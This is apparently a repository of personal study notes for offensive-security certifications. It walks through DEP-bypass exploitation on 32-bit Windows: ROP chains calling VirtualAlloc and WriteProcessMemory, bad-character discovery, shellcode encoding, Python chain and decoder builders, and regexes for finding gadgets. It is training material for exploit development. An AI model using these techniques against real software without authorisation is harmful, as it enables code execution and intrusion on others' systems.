├── OSWE.md
├── README.md
├── OSED_DEP_Bypass_VA.md
├── OSED_DEP_Bypass_WPM.md
├── OSED_Gadget_Regex.md
└── OSEP.md

/OSWE.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSCE3-Notes
Personal learning notes for OSCE3: OSEP, OSWE, and OSED

Completed **OSEP** and **OSWE**

## OSEP
Please check **OSEP.md**.

It is more of a checklist or cheat sheet than a set of learning notes; it cannot replace the course PDF.

Some of the tips and tricks may be dated.

It is not a comprehensive pentesting or red teaming checklist; it only covers OSEP exam preparation.

## OSWE
Currently working on this.

## OSED
For the DEP bypass portion, please check **OSED_DEP_Bypass_WPM.md**, **OSED_DEP_Bypass_VA.md**, and **OSED_Gadget_Regex.md**.
--------------------------------------------------------------------------------
/OSED_DEP_Bypass_VA.md:
--------------------------------------------------------------------------------
# Stack Layout When Crashing
```
 _____________________________
| A * (offset-len(va))        | Lower Address
|_____________________________|
| VirtualAllocStub Address    |
|_____________________________|
| Return Address              |
|_____________________________|
| lpAddress argument          |
|_____________________________|
| dwSize argument             |
|_____________________________|
| flAllocationType argument   |
|_____________________________|
| flProtect argument          |
|_____________________________|
| Overwritten EIP:            |
| gadget saving initial ESP   |
|_____________________________|
| B * gap (gap can be 0)      |
|_____________________________|
| Start of ROP chain          |
| = initial ESP               |
|_____________________________|
| ROP chain ...               |
|_____________________________|
| Start of shellcode          |
|_____________________________| Higher Address
```

# Steps
## Crash the application
Find a payload length that is sufficient to crash the application.

## Find the offset to overwrite EIP
Find the offset at which the payload overwrites EIP.
```bash
msf-pattern_create -l <length>
msf-pattern_offset -l <length> -q <EIP value>
```

## Find the offset from return address to ESP
When the application crashes, find the distance between the return address and ESP. Sometimes it is 0, sometimes it is not.
```windbg
dd esp + <offset>
```

```bash
msf-pattern_offset -l <length> -q <value at ESP>
```
Pad the gap, and align the valid payload with ESP.

## Find bad characters
Replace the actual payload with the characters 0x01 to 0xff, then compare the bytes in memory with the bytes sent to find all the bad characters.

```python
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
```

The payload is ```A * length + B * gap + \x01\x02\x03...\xff```. Remove each bad character found and repeat until the whole sequence survives in memory.

## Select a gadget that saves the initial ESP when crashing
Note the base address of an unprotected module (one that narly reports without ASLR or rebasing, so its addresses are stable):
```windbg
.load narly
!nmod
lm m <module>
```

Run rp++ (rp.exe) or the script to collect gadgets, and discard every gadget whose address contains a bad character.

First, select a gadget that saves the initial ESP when crashing.

Some typical forms:

- push esp; pop ANY
- push esp; other instructions; pop ANY
- mov ANY, esp
- lea ANY, [esp]
- lea ANY, [esp+offset]
- add/or/xor ANY, esp (when ANY is already 0), imul ANY, esp (when ANY is 1), or sub ANY, esp followed by neg ANY

## Overwrite EIP with the gadget that saves the initial ESP
Overwrite EIP with the gadget that saves the initial ESP; the initial ESP points to the start of the ROP chain.

```python
from struct import pack

eip = pack("<L", SAVE_ESP_GADGET)   # address of the gadget that saves the initial ESP
```

## Construct placeholder arguments required for calling VA
The upper-case names are placeholders for values taken from the target; every slot except the ones marked otherwise is repaired by the ROP chain.

```python
va  = pack("<L", VA_ADDRESS)        # VirtualAllocStub: dummy value or IAT entry (patched)
va += pack("<L", SHELLCODE_RET)     # return address: start of shellcode (patched)
va += pack("<L", LP_ADDRESS)        # lpAddress: start of shellcode (patched)
va += pack("<L", DWSIZE_NEG)        # dwSize: negated so the dword holds no bad character (restored with neg)
va += pack("<L", FLALLOC_NEG)       # flAllocationType: negated (value - 1) (restored with neg, then inc)
va += pack("<L", FLPROTECT_NEG)     # flProtect: negated (restored with neg)
```

## Fetch IAT and address
If VirtualAlloc is imported into the module, fetch its IAT entry.

If it is not imported, find any KERNEL32 function that is imported and calculate the offset between the two functions; the chain reads the imported function's address from the IAT and adds the offset.

```windbg
x kernel32!<imported function>
x kernel32!VirtualAllocStub
? <VirtualAllocStub address> - <imported function address>
```

## Patch VA address argument
The initial ESP points to the start of the ROP chain; the VA address slot is 0x1c+gap bytes below it (six placeholder dwords plus the overwritten EIP dword).

## Patch return address
Use `inc` four times, or add 4, to move from the VA address slot to the return address slot. Since the ROP chain is not finished yet, reserve a sufficient length for it, for instance 0x210 bytes.

So the shellcode is 0x210 bytes away from the return address slot, and the value written into that slot is the slot's own address plus 0x210.

## Patch lpAddress argument
The process is very similar to patching the return address, but the offset is 4 bytes less, because this slot is 4 bytes closer to the shellcode.

## Patch dwSize
Increase the address by 4 bytes, fetch and neg the value of the dwSize slot.

## Patch flAllocationType
Increase the address by 4 bytes, fetch, neg, and inc the value of the flAllocationType slot (neg alone would leave a null byte in the placeholder).

## Patch flProtect
Increase the address by 4 bytes, fetch and neg the value of the flProtect slot.

## Align ESP with VA address
The register now points at the flProtect slot. Subtract 0x18 (0x14 + 4) to land one dword below the VA address slot, move that into EBP, and finish with `mov esp, ebp; pop ebp; ret`: the `pop` consumes the extra dword and the `ret` returns into VirtualAlloc, which then finds its return address and arguments laid out above it.

## Calculate the offset between the placeholder shellcode address and actual shellcode address
Break before the call, dump the patched lpAddress value, and compare it with where the shellcode really starts; adjust the reserved length (0x210 above) by the difference.
```windbg
dd <lpAddress slot> l1
dd <patched value> + <offset>
```
--------------------------------------------------------------------------------
/OSED_DEP_Bypass_WPM.md:
--------------------------------------------------------------------------------
# Stack Layout When Crashing
```
 _____________________________
| A * (offset-len(wpm))       | Lower Address
|_____________________________|
| WPM Address                 |
|_____________________________|
| Return Address              |
|_____________________________|
| hProcess argument           |
|_____________________________|
| lpBaseAddress argument      |
|_____________________________|
| lpBuffer argument           |
|_____________________________|
| nSize argument              |
|_____________________________|
| lpNumberOfBytesWritten arg  |
|_____________________________|
| Overwritten EIP:            |
| gadget saving initial ESP   |
|_____________________________|
| B * gap (gap can be 0)      |
|_____________________________|
| Start of ROP chain          |
| = initial ESP               |
|_____________________________|
| ROP chain ...               |
|_____________________________|
| Start of shellcode          |
|_____________________________|
| The first bad character     |
|_____________________________|
| ......                      |
|_____________________________|
| The last bad character      |
|_____________________________| Higher Address
```

# Steps
## Crash the application
Find a payload length that is sufficient to crash the application.

## Find the offset to overwrite EIP
Find the offset at which the payload overwrites EIP.
```bash
msf-pattern_create -l <length>
msf-pattern_offset -l <length> -q <EIP value>
```

## Find the offset from return address to ESP
When the application crashes, find the distance between the return address and ESP. Sometimes it is 0, sometimes it is not.
```windbg
dd esp + <offset>
```

```bash
msf-pattern_offset -l <length> -q <value at ESP>
```
Pad the gap, and align the valid payload with ESP.

## Find bad characters
Replace the actual payload with the characters 0x01 to 0xff, then compare the bytes in memory with the bytes sent to find all the bad characters.

```python
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
```

The payload is ```A * length + B * gap + \x01\x02\x03...\xff```. Remove each bad character found and repeat until the whole sequence survives in memory.

## Select a gadget that saves the initial ESP when crashing
Note the base address of an unprotected module (one that narly reports without ASLR or rebasing, so its addresses are stable):
```windbg
.load narly
!nmod
lm m <module>
```

Run rp++ (rp.exe) or the script to collect gadgets, and discard every gadget whose address contains a bad character.

First, select a gadget that saves the initial ESP when crashing.

Some typical forms:

- push esp; pop ANY
- push esp; other instructions; pop ANY
- mov ANY, esp
- lea ANY, [esp]
- lea ANY, [esp+offset]
- add/or/xor ANY, esp (when ANY is already 0), imul ANY, esp (when ANY is 1), or sub ANY, esp followed by neg ANY

## Overwrite EIP with the gadget that saves the initial ESP
Overwrite EIP with the gadget that saves the initial ESP; the initial ESP points to the start of the ROP chain.

```python
from struct import pack

eip = pack("<L", SAVE_ESP_GADGET)   # address of the gadget that saves the initial ESP
```

## Construct placeholder arguments required for calling WPM
The upper-case names are placeholders for values taken from the target.

```python
wpm  = pack("<L", WPM_ADDRESS)      # WriteProcessMemoryStub: dummy value or IAT entry (patched)
wpm += pack("<L", SHELLCODE_RET)    # Shellcode Return Address: code cave in .text
wpm += pack("<L", 0xffffffff)       # hProcess: current-process pseudo-handle, no patch needed
wpm += pack("<L", CODE_CAVE)        # lpBaseAddress: code cave in .text
wpm += pack("<L", LP_BUFFER)        # lpBuffer: placeholder, patched with the shellcode address on the stack
wpm += pack("<L", 0xfffffe92)       # nSize: -0x16e, restored with neg
wpm += pack("<L", DATA_DWORD)       # lpNumberOfBytesWritten: unused dword in .data, no patch needed
```

The WPM address can be a dummy address (depending on the usable gadgets) or the function's IAT entry; either way it is patched by the chain.

The shellcode return address and lpBaseAddress both hold an address in the .text section where the following hundreds of bytes are unused (the code cave below).

hProcess is set to 0xffffffff, the pseudo-handle for the current process, so it needs no patching.

lpBuffer holds a placeholder value and is patched with the address of the shellcode on the stack.

nSize is set to 0xfffffe92; neg recovers the original value, 0x16e bytes.

lpNumberOfBytesWritten points to an unused dword in the .data section, so it needs no patching.

## Locate a code cave in the .text section
Locate a code cave in the .text section to hold the copied shellcode. It is in the unused part of the last memory page of the .text section: the section is mapped in whole pages, so the bytes between the end of its VirtualSize and the page boundary are executable and unused.

```windbg
!dh -s <module>
!address <module base> + <.text VirtualAddress>
```

Select an address higher than ```<module base> + <.text VirtualAddress> + <.text VirtualSize>```, and make sure the following hundreds of bytes are usable (still inside the mapped page and not referenced by the program).
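The placeholder arithmetic behind both layouts (the VirtualAlloc frame above in OSED_DEP_Bypass_VA.md and the WriteProcessMemory frame here), as an added example that is not the notes' own code: it picks, for each argument, the dword that survives the bad-character filter and the neg / neg+inc / neg+dec steps that restore it, builds the crash-time frame, and checks the distance from the initial ESP back to the API slot. The bad-character set, the filler dword and the VirtualAlloc values (0x1 for dwSize, MEM_COMMIT|MEM_RESERVE = 0x3000 and PAGE_EXECUTE_READWRITE = 0x40, the usual DEP-bypass arguments) are assumptions of the example; the WriteProcessMemory values are the ones the notes state.

```python
# Added example (not from the notes): model the crash-time frame used by the
# VirtualAlloc and WriteProcessMemory DEP-bypass layouts and derive the
# placeholder values that the ROP chain later repairs in place with
# neg / neg+inc / neg+dec. Addresses, the bad-character set and the filler
# dword are constructed for the demo.
from struct import pack

BADCHARS = b"\x00\x0a\x0d"   # assumed bad characters for this target
FILLER = 0x41414141          # assumed dummy dword for slots the chain patches at run time


def has_badchar(dword, badchars=BADCHARS):
    """True if the little-endian encoding of dword contains a bad character."""
    return any(b in badchars for b in pack("<L", dword))


def placeholder(value, badchars=BADCHARS):
    """Return (placeholder_dword, fixups): what to put on the stack and the
    in-place gadget steps (neg / inc / dec) that restore `value`."""
    candidates = [
        (value, []),                                     # usable as-is
        ((-value) & 0xffffffff, ["neg"]),                # neg [reg+off]
        ((-(value - 1)) & 0xffffffff, ["neg", "inc"]),   # neg, then inc [reg+off]
        ((-(value + 1)) & 0xffffffff, ["neg", "dec"]),   # neg, then dec [reg+off]
    ]
    for dword, fixups in candidates:
        if not has_badchar(dword, badchars):
            return dword, fixups
    raise ValueError(f"no bad-character-free placeholder for {value:#x}")


def apply_fixups(dword, fixups):
    """Simulate the repair gadgets on a 32-bit stack slot."""
    for step in fixups:
        if step == "neg":
            dword = (-dword) & 0xffffffff
        elif step == "inc":
            dword = (dword + 1) & 0xffffffff
        elif step == "dec":
            dword = (dword - 1) & 0xffffffff
        else:
            raise ValueError(step)
    return dword


def build_frame(api_args):
    """Placeholder frame: [API address][return address][arg 1]...[arg n].
    api_args is a list of (name, value); value None means the slot is
    filled at run time (shellcode / cave address) and gets a filler now."""
    frame = pack("<L", FILLER) * 2
    fixups = {}
    for name, value in api_args:
        if value is None:
            frame += pack("<L", FILLER)
            continue
        dword, fixups[name] = placeholder(value)
        frame += pack("<L", dword)
    return frame, fixups


def build_payload(offset, eip_gadget, gap, frame, rop_chain, shellcode):
    """A * (offset - len(frame)) | frame | EIP | B * gap | ROP chain | shellcode."""
    payload = b"A" * (offset - len(frame))
    payload += frame
    payload += pack("<L", eip_gadget)
    payload += b"B" * gap
    payload += rop_chain + shellcode
    return payload


def api_slot_distance(n_args, gap):
    """Bytes from the initial ESP (start of the ROP chain) back to the API
    address slot: the frame dwords, the overwritten EIP dword and the gap."""
    return 4 * (2 + n_args) + 4 + gap


# The two frames from the notes; None marks slots patched by the chain.
VA_ARGS = [("lpAddress", None), ("dwSize", 0x1),
           ("flAllocationType", 0x3000), ("flProtect", 0x40)]
WPM_ARGS = [("hProcess", 0xffffffff), ("lpBaseAddress", None), ("lpBuffer", None),
            ("nSize", 0x16e), ("lpNumberOfBytesWritten", None)]

if __name__ == "__main__":
    for label, args in (("VirtualAlloc", VA_ARGS), ("WriteProcessMemory", WPM_ARGS)):
        frame, fixups = build_frame(args)
        print(f"{label}: frame {len(frame)} bytes, API slot at ESP-{api_slot_distance(len(args), 0):#x}")
        for name, steps in fixups.items():
            print(f"  {name}: {steps or 'no patch needed'}")
```

Running it reproduces the notes' choices: dwSize 0x1 becomes 0xffffffff (neg), flAllocationType 0x3000 becomes 0xffffd001 (neg, inc) because 0xffffd000 still carries a null byte, nSize 0x16e becomes 0xfffffe92 (neg), and hProcess 0xffffffff needs no patch. The distance helper gives 0x1c for the six-dword VirtualAlloc frame and 0x20 for the seven-dword WriteProcessMemory frame, plus the gap in each case.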

## Locate a usable DWORD in the .data section
Locate the .data section: ```<module base> + <.data VirtualAddress>```

A usable dword can be the first dword after the end of the actual data in the .data section: ```<module base> + <.data VirtualAddress> + <.data SizeOfRawData> + 4```. Confirm with `!address` that it is writable and with `dd` that the program does not use it.

## Fetch IAT and address
If WPM is imported into the module, fetch its IAT entry.

If WPM is not imported, find any imported KERNEL32 function and calculate the offset between the two functions; the chain reads the imported function's address from the IAT and adds the offset.

```windbg
x kernel32!<imported function>
x kernel32!WriteProcessMemoryStub
? <WriteProcessMemoryStub address> - <imported function address>
```

## Patch WPM address argument
The initial ESP points to the start of the ROP chain; the WPM address slot is 0x20+gap bytes below it (seven placeholder dwords plus the overwritten EIP dword, 8 dwords in total).

## Patch lpBuffer argument
Increase the address by 0x10 bytes from the WPM address slot to reach the lpBuffer slot. Since the ROP chain is not finished yet, reserve a sufficient length for it, for instance 0x49c bytes.

So the shellcode is 0x49c bytes away from the lpBuffer slot, and the value written into lpBuffer is the slot's own address plus 0x49c.

## Patch nSize
Increase the address by 4 bytes, fetch and neg the value of the nSize slot.

## Align start of shellcode
The register now points at the nSize slot, which is 4 bytes closer to the shellcode than lpBuffer, so the distance is 4 less, for instance 0x498. Add it so that the register points at the first byte of the shellcode; the decoding loop below starts from there.

## Map bad characters and encode shellcode
The shellcode will be copied into the .text section. A msfvenom decoder stub rewrites its own bytes and therefore expects to run from writable memory; .text is not writable, so MSF encoding will not work there. Instead, replace the bad characters before sending and let the ROP chain decode the shellcode in place on the (writable) stack before WPM copies it into .text.

First, encode the original shellcode by replacing the bad characters, and record the positions (indexes) of the bad characters in the shellcode array.

```python
from struct import pack

BADCHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"
REPLACECHARS = b"\x02\x0c\x0f\x27\x28\x2d\x3f"

def mapBadChars(sh):
    # indexes of every byte the ROP chain must decode back (run on the original shellcode)
    badIndex = [i for i, b in enumerate(sh) if b in BADCHARS]
    print(badIndex)
    return badIndex

def encodeShellcode(sh):
    # replace each bad character with its substitute (none of the substitutes is itself bad)
    encodedShell = sh
    for i in range(len(BADCHARS)):
        encodedShell = encodedShell.replace(pack("B", BADCHARS[i]), pack("B", REPLACECHARS[i]))
    return encodedShell
```

## Decode Shellcode
The bad characters are now replaced by other characters; a simple add/sub operation on each replaced byte recovers the original value.

Depending on the usable gadgets, use add or sub to recover the original byte: ```REPLACECHARS[i] = BADCHARS[i] + CHARSTOSUB[i]``` (decode by subtracting) or ```REPLACECHARS[i] = BADCHARS[i] - CHARSTOSUB[i]``` (decode by adding).

The offset between two replaced bytes is a small positive number, so its dword contains null bytes; negate it so that the chain holds no \x00: ```neg_offset = (-offset) & 0xffffffff```. The chain negates it back (or subtracts it) before applying it to the pointer register. An offset that is a multiple of 0x100 still has a null low byte after negation, so split such a move into two.

Desired gadgets to decode the replaced characters are as follows:

```asm
; offset can be 0
add byte [REG1+offset], l-REG2; ret;
add byte [REG1+offset], h-REG2; ret;
sub byte [REG1+offset], l-REG2; ret;
sub byte [REG1+offset], h-REG2; ret;
```
REG2 is loaded with ```pop REG2```, so the whole dword must be free of bad characters while only the byte the gadget uses carries the delta:

If the delta is taken from the h-register (e.g. CH), embed it in the second byte: ```value = (value << 8) | 0x11110011``` (for a sub gadget; with an add gadget embed the negated delta instead).

If the delta is taken from the l-register (e.g. CL), store the negated delta: ```value = (-value) & 0xffffffff```, so that ```add byte [REG1], l-REG2``` subtracts it (an 8-bit add of 0xfe is a subtraction of 2). With a sub gadget store the positive delta instead.

Make sure the same register points to the current bad character at the beginning and end of each loop iteration. For instance, EDX first points to the nSize slot and is moved to the start of the shellcode by the alignment step above; at the end of each iteration EDX points to the character just decoded, and the next iteration adds the distance to the following one.
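The encode and decode steps described above, run end to end as an added example (not the notes' own code): the bad bytes are replaced, a chain of `pop eax / neg eax / add edx, eax / pop ecx / add byte [edx], cl` gadgets is emitted exactly as the text prescribes (negated offsets, negated delta in CL), and a tiny interpreter executes that chain against the encoded bytes to prove the original shellcode comes back. Gadget addresses are assumed values chosen to be free of bad characters, and the sample shellcode is constructed; the split of a 0x100-byte move into two is the edge case the text warns about.

```python
# Added example (not from the notes): encode a shellcode's bad bytes, emit
# the decode chain described above (move a pointer register by a negated
# offset, then add a negated delta to the byte with `add byte [edx], cl`),
# and run that chain through a tiny ROP interpreter to show the original
# bytes come back. Gadget addresses and the sample shellcode are constructed.
from struct import pack

BADCHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"
REPLACECHARS = b"\x02\x0c\x0f\x27\x28\x2d\x3f"   # each one is the bad byte + DELTA
DELTA = 2

# Assumed gadget addresses (free of bad characters); run_chain() gives them
# their x86 semantics.
POP_EAX = 0x10101011          # pop eax; ret
NEG_EAX = 0x10101022          # neg eax; ret
ADD_EDX_EAX = 0x10101033      # add edx, eax; ret
POP_ECX = 0x10101044          # pop ecx; ret
ADD_BYTE_EDX_CL = 0x10101055  # add byte [edx], cl; ret


def bad_free(dword):
    return not any(b in BADCHARS for b in pack("<L", dword))


def encode(sh):
    """Replace every bad byte; return the encoded bytes and the bad indexes."""
    table = dict(zip(BADCHARS, REPLACECHARS))
    encoded = bytes(table.get(b, b) for b in sh)
    bad_index = [i for i, b in enumerate(sh) if b in BADCHARS]
    return encoded, bad_index


def split_offset(offset):
    """Split a pointer move into steps whose negated dword has no bad byte
    (e.g. 0x100 -> -0x100 = 0xffffff00 carries a null, so move 0xff then 1)."""
    steps = []
    while offset:
        step = offset
        while not bad_free((-step) & 0xffffffff):
            step -= 1
        steps.append(step)
        offset -= step
    return steps


def decode_chain(bad_index):
    """ROP chain that assumes EDX points at the first shellcode byte on entry."""
    chain = b""
    prev = 0
    for idx in bad_index:
        for step in split_offset(idx - prev):
            chain += pack("<L", POP_EAX) + pack("<L", (-step) & 0xffffffff)
            chain += pack("<L", NEG_EAX)        # eax = step
            chain += pack("<L", ADD_EDX_EAX)    # edx += step -> the bad byte
        prev = idx
        chain += pack("<L", POP_ECX) + pack("<L", (-DELTA) & 0xffffffff)   # cl = 0xfe
        chain += pack("<L", ADD_BYTE_EDX_CL)    # byte [edx] += 0xfe == byte -= 2
    return chain


def run_chain(chain, memory, edx):
    """Minimal interpreter: memory is a bytearray, edx an index into it."""
    regs = {"eax": 0, "ecx": 0, "edx": edx}
    dwords = [int.from_bytes(chain[i:i + 4], "little") for i in range(0, len(chain), 4)]
    pc = 0
    while pc < len(dwords):
        gadget = dwords[pc]
        pc += 1
        if gadget == POP_EAX:
            regs["eax"] = dwords[pc]
            pc += 1
        elif gadget == POP_ECX:
            regs["ecx"] = dwords[pc]
            pc += 1
        elif gadget == NEG_EAX:
            regs["eax"] = (-regs["eax"]) & 0xffffffff
        elif gadget == ADD_EDX_EAX:
            regs["edx"] = (regs["edx"] + regs["eax"]) & 0xffffffff
        elif gadget == ADD_BYTE_EDX_CL:
            i = regs["edx"]
            memory[i] = (memory[i] + (regs["ecx"] & 0xff)) & 0xff
        else:
            raise ValueError(f"unknown gadget {gadget:#x}")
    return regs


def roundtrip(sh):
    """Encode, build the chain, check it is bad-character free, decode in place."""
    encoded, bad_index = encode(sh)
    chain = decode_chain(bad_index)
    if any(b in BADCHARS for b in chain):
        raise ValueError("decode chain contains a bad character")
    memory = bytearray(encoded)
    run_chain(chain, memory, 0)
    return bytes(memory)
```

Because every delta here is the same (2), the `pop ecx` could be hoisted out of the loop to shorten the chain; it is kept per byte so that a per-character CHARSTOSUB table works unchanged. The chain length is what the reserved distance (0x49c above) has to cover, so recompute that value after the decoder is final.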

```python
from struct import pack

# Gadget addresses are target-specific placeholders; fill them in from the
# gadget list collected earlier. The sequence assumes these gadgets:
#   pop eax; ret  /  neg eax; ret  /  add edx, eax; ret
#   pop ecx; ret  /  add byte [edx], cl; ret
def decodeShellcode(badIndex, shellcode):
    # REPLACECHARS[i] = CHARSTOSUB[i] + BADCHARS[i]
    # REPLACECHARS = b"\x02\x0c\x0f\x27\x28\x2d\x3f"
    BADCHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"
    CHARSTOSUB = b"\x02\x02\x02\x02\x02\x02\x02"
    restoreRop = b""
    for i in range(len(badIndex)):
        if i == 0:
            offset = badIndex[i]
        else:
            offset = badIndex[i] - badIndex[i-1]
        neg_offset = (-offset) & 0xffffffff
        value = 0
        for j in range(len(BADCHARS)):
            if shellcode[badIndex[i]] == BADCHARS[j]:
                value = CHARSTOSUB[j]
        value = (-value) & 0xffffffff          # l-register form: add cl subtracts the delta
        # value = (value << 8) | 0x11110011    # h-register form: sub ch
        # EDX points to the previous bad character (initially the start of the shellcode)
        restoreRop += pack("<L", POP_EAX)          # pop eax; ret
        restoreRop += pack("<L", neg_offset)
        restoreRop += pack("<L", NEG_EAX)          # neg eax; ret
        restoreRop += pack("<L", ADD_EDX_EAX)      # add edx, eax; ret  -> EDX = next bad character
        restoreRop += pack("<L", POP_ECX)          # pop ecx; ret
        restoreRop += pack("<L", value)
        restoreRop += pack("<L", ADD_BYTE_EDX_CL)  # add byte [edx], cl; ret
    return restoreRop
```

Verify in WinDbg:

```windbg
dd <address> l1
dd <address> - <offset> l7
```

## Align Shellcode
Calculate the offset between the placeholder shellcode address and the actual shellcode address, and correct the reserved length (0x49c above) by the difference.

```windbg
dd <lpBuffer slot> l1        (before calling WPM)
dd <patched value> + <offset>
```
--------------------------------------------------------------------------------
/OSED_Gadget_Regex.md:
--------------------------------------------------------------------------------
# Quick Reference
Register placeholder: ```[A-Za-z]+```

Pointer dereference [register+offset]: ```dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]```

rp++ prints gadgets in lowercase with a space before every `;` and a trailing `(N found)`; the patterns below assume the compact `instr; instr;` form, so normalise the dump (or allow `\s*;` in the patterns) before searching.

# Category
## Save Initial ESP
### push esp; Other instructions; pop REG1; ret;

Priority: `High`

RegEx: ```push esp(.*); pop [A-Za-z]+```

Description: The initial ESP is saved in register REG1, provided the instructions in between do not touch the stack.

Example: ```push esp; mov eax, ecx; pop esi;```

### push esp; pop REG1; ret;

Priority: `High`

RegEx: ```push esp; pop [A-Za-z]+;```

Description: The initial ESP is saved in register REG1.

### lea REG1, [esp]; ret;

Priority: `High`

RegEx: ```lea [A-Za-z]+, \[esp\];```

Description: The initial ESP is saved in register REG1. (`lea` always takes a memory operand, so there is no `lea REG1, esp` form; `mov REG1, esp` is the register-to-register equivalent.)

### lea REG1, [esp+offset]; ret;

Priority: `High`

RegEx: ```lea [A-Za-z]+, \[esp```

Description: The initial ESP plus an offset is saved in register REG1.

Example: ```lea esi, [esp+4];``` stores `ESP+4` in ESI. After the gadget, subtract 4 to get the initial ESP.

### mov REG1, esp; ret;

Priority: `High`

RegEx: ```mov [A-Za-z]+, esp;```

Description: Register REG1 saves the initial ESP.

### or REG1, esp;

Priority: `High`

RegEx: ```or [A-Za-z]+, esp;```

Description: Assuming REG1 is already zero, register REG1 saves the initial ESP.

Example: After a gadget like ```xor eax, eax; ret```, ```or eax, esp; ret;``` saves the initial ESP.

### xor REG1, esp;

Priority: `High`

RegEx: ```xor [A-Za-z]+, esp;```

Description: Assuming REG1 is already zero, register REG1 saves the initial ESP.

Example: After a gadget like ```xor eax, eax; ret```, ```xor eax, esp; ret;``` saves the initial ESP.

### add REG1, esp;

Priority: `High`

RegEx: ```add [A-Za-z]+, esp;```

Description: Assuming REG1 is already zero, register REG1 saves the initial ESP.

Example: After a gadget like ```xor eax, eax; ret```, ```add eax, esp; ret;``` saves the initial ESP.

### sub REG1, esp;

Priority: `High`

RegEx: ```sub [A-Za-z]+, esp;```

Description: Assuming REG1 is already zero, REG1 ends up holding `-ESP`; a following `neg` gives the initial ESP.

Example: After a gadget like ```xor eax, eax; ret```, ```sub eax, esp; ret;``` followed by ```neg eax; ret;``` saves the initial ESP.

## Pointer Dereference
### mov REG1, [REG+offset]; ret;

Priority: `High`

RegEx: ```mov [A-Za-z]+, dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]```

Description: Can be used to fetch an argument value.

Example: Assume ESI points to the 2nd argument of `VirtualAlloc`; ```mov eax, [esi+0x4];``` loads the value of the 3rd argument into EAX.

## Write What Where
### mov [REG+offset], REG1; ret;

Priority: `High`

RegEx: ```mov dword \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+```

Description: Can be used to patch an argument.

Example: Assume EAX points to the 2nd argument of VirtualAlloc; ```mov [eax+0x4], ecx;``` patches the 3rd argument with the value stored in ECX.

## Swap Register
### mov REG1, REG2; ret;

Priority: `High`

RegEx: ```mov [A-Za-z]+, [A-Za-z]+;```

Description: Assign a value to a register.

Example: Register EAX holds the initial ESP; ```mov esi, eax;``` backs it up in ESI in case EAX is overwritten by later gadgets.

### xchg REG1, REG2; ret;

Priority: `High`

RegEx: ```xchg [A-Za-z]+, [A-Za-z]+;```
